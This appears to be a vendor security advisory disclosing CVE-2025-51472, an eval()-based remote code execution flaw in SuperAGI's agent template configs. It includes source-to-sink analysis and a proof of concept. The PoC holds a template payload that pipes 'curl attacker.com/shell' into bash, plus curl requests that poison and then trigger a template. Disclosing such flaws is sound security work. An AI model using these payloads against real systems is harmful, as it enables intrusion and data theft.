Gecko Security
Get a Demo
Back to Research
CVSS 6.5mediumCVE-2025-51472

CVE-2025-51472: SuperAGI RCE via Unsafe Eval in Template Config

Remote code execution vulnerability in SuperAGI through unsafe eval() usage in agent template configuration processing.

Gecko Security Research
Gecko Security Team
1/15/2025

Description

An RCE was found in SuperAGI in the AgentTemplate.eval_agent_config method. The vulnerability is caused by the direct use of Python's eval() function on user-controlled input without any sanitization or validation. When an agent template is cloned from the marketplace or updated via the API, configuration values for keys such as 'goal', 'constraints', and 'instruction' are passed directly to eval(). The code in agent_template.py explicitly evaluates these values:

elif key == "goal" or key == "constraints" or key == "instruction":
    return eval(value)

Since these values can be controlled by an attacker, arbitrary Python code execution is possible, leading to complete system compromise.

Source - Sink Analysis

Source:

  • Function: AgentTemplate.fetch_marketplace_detail
  • File Path: superagi/models/agent_template.py
  • Description: Initial HTTP request that receives untrusted data from marketplace API.
  • Code: response = requests.get(marketplace_url + "agent_templates/marketplace/template_details/" + str(agent_template_id),

Intermediate:

  • Function: AgentTemplate.clone_agent_template_from_marketplace
  • File Path: superagi/models/agent_template.py
  • Description: Processes marketplace response and stores config values.
  • Code: agent_configurations.append(AgentTemplateConfig(agent_template_id=template.id, key=key, value=str(value["value"])))

Sink:

  • Function: AgentTemplate.eval_agent_config
  • File Path: superagi/models/agent_template.py
  • Description: Dangerous eval() call on user-controlled input.
  • Code: return eval(value)

PoC

  1. Create a malicious marketplace template JSON:

    {
  "name": "Evil Template",
  "description": "RCE",
  "agent_workflow_name": "Goal Based Agent",
  "configs": {
    "goal": "__import__('os').system('curl attacker.com/shell | bash')",
    "instruction": [],
    "constraints": []
  }
}

  2. Host this JSON at a marketplace endpoint that the target SuperAGI instance trusts.

  3. When a victim clones this template, the eval() call in eval_agent_config will execute the malicious Python code in the 'goal' config.

You can also exploit the same path via the template update API after creating a template:

curl -X PUT "http://localhost:3000/api/agent_templates/update_agent_template/1" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Exploited Template",
    "description": "RCE Test",
    "agent_configs": {
        "agent_workflow": "Goal Based Workflow",
        "goal": "__import__(\"os\").system(\"touch /tmp/pwned\")",
        "instruction": ["Test instruction"],
        "constraints": ["Test constraint"],
        "tools": ["Read File", "Write File"],
        "exit": "No exit criterion",
        "iteration_interval": 500,
        "model": "gpt-3.5-turbo",
        "max_iterations": 25,
        "permission_type": "God Mode",
        "LTM_DB": "Pinecone"
    }
}'

Once the template is poisoned, accessing it triggers the execution: curl "http://localhost:3000/api/agent_templates/agent_config?agent_template_id=1".

Impact

This vulnerability allows for complete system compromise by an attacker who can manipulate template data through either the marketplace or direct API access. The attacker can execute arbitrary code with the permissions of the service running SuperAGI, potentially leading to data theft, lateral movement within the network, persistent system access or infrastructure compromise.